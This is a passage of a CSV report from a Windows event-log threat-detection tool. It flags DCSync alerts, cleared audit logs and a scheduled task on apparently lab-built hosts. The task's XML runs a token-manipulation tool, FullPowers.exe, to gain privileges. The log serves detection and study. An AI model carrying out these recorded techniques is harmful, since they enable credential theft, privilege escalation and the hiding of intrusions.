c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14674 ",DC1.insecurebank.local,Security Dcsync Attack detected,1553549325.022631,2019-03-26T01:28:45.022631+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242588 Security DC1.insecurebank.local 2EA9670C-F0F9-4D3F-90E5-A087E8C05863 - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14675 ",DC1.insecurebank.local,Security schedule task created,1583587059.98454,2020-03-07T17:17:39.984540+04:00,,Audit,High,schedule task created by user,4698," 4698 0 0 12804 0 0x8020000000000000 282588 Security MSEDGEWIN10 S-1-5-19 LOCAL SERVICE NT AUTHORITY 0x3e5 \FullPowersTask <?xml version="1.0" encoding="UTF-16"?> <Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <URI>\FullPowersTask</URI> </RegistrationInfo> <Triggers /> <Principals> <Principal id="Author"> <UserId>S-1-5-19</UserId> <RunLevel>LeastPrivilege</RunLevel> <RequiredPrivileges> <Privilege>SeAssignPrimaryTokenPrivilege</Privilege> <Privilege>SeAuditPrivilege</Privilege> <Privilege>SeChangeNotifyPrivilege</Privilege> <Privilege>SeCreateGlobalPrivilege</Privilege> <Privilege>SeImpersonatePrivilege</Privilege> <Privilege>SeIncreaseQuotaPrivilege</Privilege> <Privilege>SeIncreaseWorkingSetPrivilege</Privilege> </RequiredPrivileges> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <StartWhenAvailable>false</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <Duration>PT10M</Duration> <WaitTimeout>PT1H</WaitTimeout> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession> <UseUnifiedSchedulingEngine>false</UseUnifiedSchedulingEngine> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>PT72H</ExecutionTimeLimit> <Priority>7</Priority> </Settings> <Actions Context="Author"> <Exec> <Command>C:\Users\Public\Tools\TokenManip\FullPowers.exe</Command> <Arguments>-t 4932</Arguments> </Exec> </Actions> </Task> ",MSEDGEWIN10,Security Audit log cleared,1651380018.084003,2022-05-01T08:40:18.084003+04:00,,Audit,Critical,Audit log cleared by user ( admin ),1102," 1102 0 4 104 0 0x4020000000000000 21365 Security wind10.winlab.local S-1-5-21-482804190-775995292-3801157738-1002 admin WIND10 0x47ea55 ",wind10.winlab.local,Security Audit log cleared,1553038508.786016,2019-03-20T03:35:08.786016+04:00,,Audit,Critical,Audit log cleared by user ( user01 ),1102," 1102 0 4 104 0 0x4020000000000000 452811 Security PC01.example.corp S-1-5-21-1587066498-1489273250-1035260531-1106 user01 EXAMPLE 0x17dad ",PC01.example.corp,Security Audit log cleared,1553549315.405631,2019-03-26T01:28:35.405631+04:00,,Audit,Critical,Audit log cleared by user ( bob ),1102," 1102 0 4 104 0 0x4020000000000000 198242566 Security DC1.insecurebank.local S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x8d7099 ",DC1.insecurebank.local,Security Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242602 Security DC1.insecurebank.local 98E50F6A-AE61-4BFF-A9F0-CCFA5CCB555C - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14675 ",DC1.insecurebank.local,Security Audit log cleared,1573805956.102509,2019-11-15T12:19:16.102509+04:00,,Audit,Critical,Audit log cleared by user ( bob ),1102," 1102 0 4 104 0 0x4020000000000000 25048 Security alice.insecurebank.local S-1-5-21-1005675359-741490361-30848483-1108 bob insecurebank 0x1c363a4 ",alice.insecurebank.local,Security Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242601 Security DC1.insecurebank.local 8E6BE6CD-81E7-4C8C-8EB0-50CA85B4950C - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14674 ",DC1.insecurebank.local,Security Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242600 Security DC1.insecurebank.local 8E6BE6CD-81E7-4C8C-8EB0-50CA85B4950C - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14675 ",DC1.insecurebank.local,Security Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242599 Security DC1.insecurebank.local 77B63738-C25C-4FBD-BA96-A7ABE17A22A3 - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 